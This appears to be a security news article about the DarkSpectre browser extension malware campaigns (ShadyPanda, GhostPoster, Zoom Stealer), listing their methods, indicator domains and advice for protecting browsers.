8.8 Million Chrome, Edge And Opera Users Compromised. If you use Google Chrome, Microsoft Edge, or Opera, this news might concern you. Over 8.8 million browser users were compromised through malicious extensions in one of the largest campaigns ever uncovered. In this 2026 rewrite, we break down what happened, who was behind it, and how you can protect yourself moving forward.
The DarkSpectre Threat Group
A newly identified Chinese-linked threat actor, known as DarkSpectre, has been connected to one of the most widespread browser extension malware operations ever discovered. According to cybersecurity researchers at Koi.ai, this operation silently infected users over a seven-year period, targeting popular browsers without raising suspicion.
Key Entities Involved
- DarkSpectre (Threat Group)
- Koi.ai (Cybersecurity Research Firm)
- Google Chrome
- Microsoft Edge
- Mozilla Firefox
- Opera Browser
What makes this campaign alarming is its scale, patience, and sophistication. Instead of quick attacks, DarkSpectre focused on long-term persistence, blending into trusted browser ecosystems.
How the Malware Operation Worked
DarkSpectre did not rely on a single malware strain. Instead, it orchestrated three interconnected campaigns, each designed for a specific purpose but working toward a shared intelligence-gathering goal.
The Three Campaigns at a Glance
| Campaign Name | Infected Users | Primary Goal | Browsers Targeted |
|---|---|---|---|
| ShadyPanda | 5.6 million | Surveillance & affiliate fraud | Chrome, Edge |
| GhostPoster | 1+ million | Stealth code execution | Firefox, Opera |
| Zoom Stealer | 2.2 million | Corporate espionage | Chrome, Edge |
Together, these campaigns formed a coordinated malware ecosystem, not isolated attacks.
ShadyPanda Campaign: Silent Surveillance at Scale
The ShadyPanda campaign was the largest and most damaging component, responsible for over 5.6 million infections.
How ShadyPanda Tricked Users
The malicious extensions were disguised as:
- New tab customizers
- Language translation tools
- Productivity add-ons
Many of these extensions appeared completely legitimate and even remained clean for years before activating malicious behavior.
What Happened After Installation
Once installed, the extensions:
- Contacted command-and-control (C2) servers
- Downloaded hidden configurations
- Injected remote JavaScript
- Hijacked search results
- Monitored browsing behavior
Known Malicious Domains
- jt2x.com
- infinitynewtab.com
These domains allowed attackers to update payloads remotely, making detection extremely difficult.
GhostPoster Campaign: Malware Hidden Inside Images
The GhostPoster campaign took stealth to another level by using steganography, a technique where malicious code is hidden inside image files.
Why This Technique Was Dangerous
Instead of loading suspicious scripts, the extensions:
- Embedded JavaScript inside PNG images
- Appeared harmless to security scanners
- Remained dormant for days after installation
After the delay, the malware extracted and executed the hidden payload.
Impact of GhostPoster
- Affected over one million users
- Enabled remote code execution
- Avoided traditional detection tools
Infrastructure Used
- gmzdaily.com
- mitarchive.info
This approach shows how browser-based attacks have evolved beyond basic script injection.
The Zoom Stealer Campaign: Corporate Espionage Explained
The most recent and arguably most dangerous operation was The Zoom Stealer campaign, which targeted corporate users rather than casual browsing activity.
How Zoom Stealer Operated
The extensions posed as:
- Video downloaders
- Productivity enhancers
- Meeting tools
Behind the scenes, they harvested sensitive corporate data from 28+ video conferencing platforms.
Platforms Affected
- Zoom
- Microsoft Teams
- Google Meet
- Webex
- Skype
Data Collected
- Meeting links
- Login credentials
- Speaker identities
- Organizational metadata
This information could be used for corporate espionage, phishing, or insider reconnaissance.
Data Exfiltration & Cloud Abuse
One of the most alarming discoveries was how attackers transmitted stolen data.
Technologies Used
- WebSocket connections (real-time data transfer)
- Google Firebase databases
- Google Cloud Functions
Known Endpoints
- zoocorder.firebaseio.com
- webinarstvus.cloudfunctions.net
By abusing trusted cloud platforms, DarkSpectre blended malicious traffic with legitimate services — a major challenge for security teams.
Why Browser Extension Attacks Are Increasing in 2026
Browser extensions remain a high-value attack surface because:
- Users blindly trust official extension stores
- Permissions are often excessive
- Security reviews are inconsistent
Common Risk Factors
- “Read and change all your data” permissions
- Poor update monitoring
- Abandoned extensions sold to attackers
How to Protect Yourself from Malicious Extensions
Best Practices for Browser Security
- Install extensions only from verified developers
- Avoid extensions with unnecessary permissions
- Regularly audit installed add-ons
- Remove unused extensions immediately
Enterprise-Level Recommendations
- Use browser extension allowlists
- Monitor outbound WebSocket traffic
- Deploy endpoint detection solutions
- Conduct regular extension reviews
FAQs
What is DarkSpectre malware?
DarkSpectre is a Chinese-linked threat group responsible for infecting millions of users through malicious browser extensions.
Which browsers were affected?
Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera were all targeted.
How can I check if an extension is malicious?
Review permissions, developer history, update behavior, and uninstall extensions you no longer need.
Are official extension stores safe?
They are safer than third-party sites, but not completely risk-free.
Can browser malware steal corporate data?
Yes. The Zoom Stealer campaign proves browser extensions can be used for corporate espionage.
Conclusion
The compromise of 8.8 million browser users is a wake-up call for both individuals and organizations. As browser extensions grow more powerful, attackers are exploiting trust at an unprecedented scale.
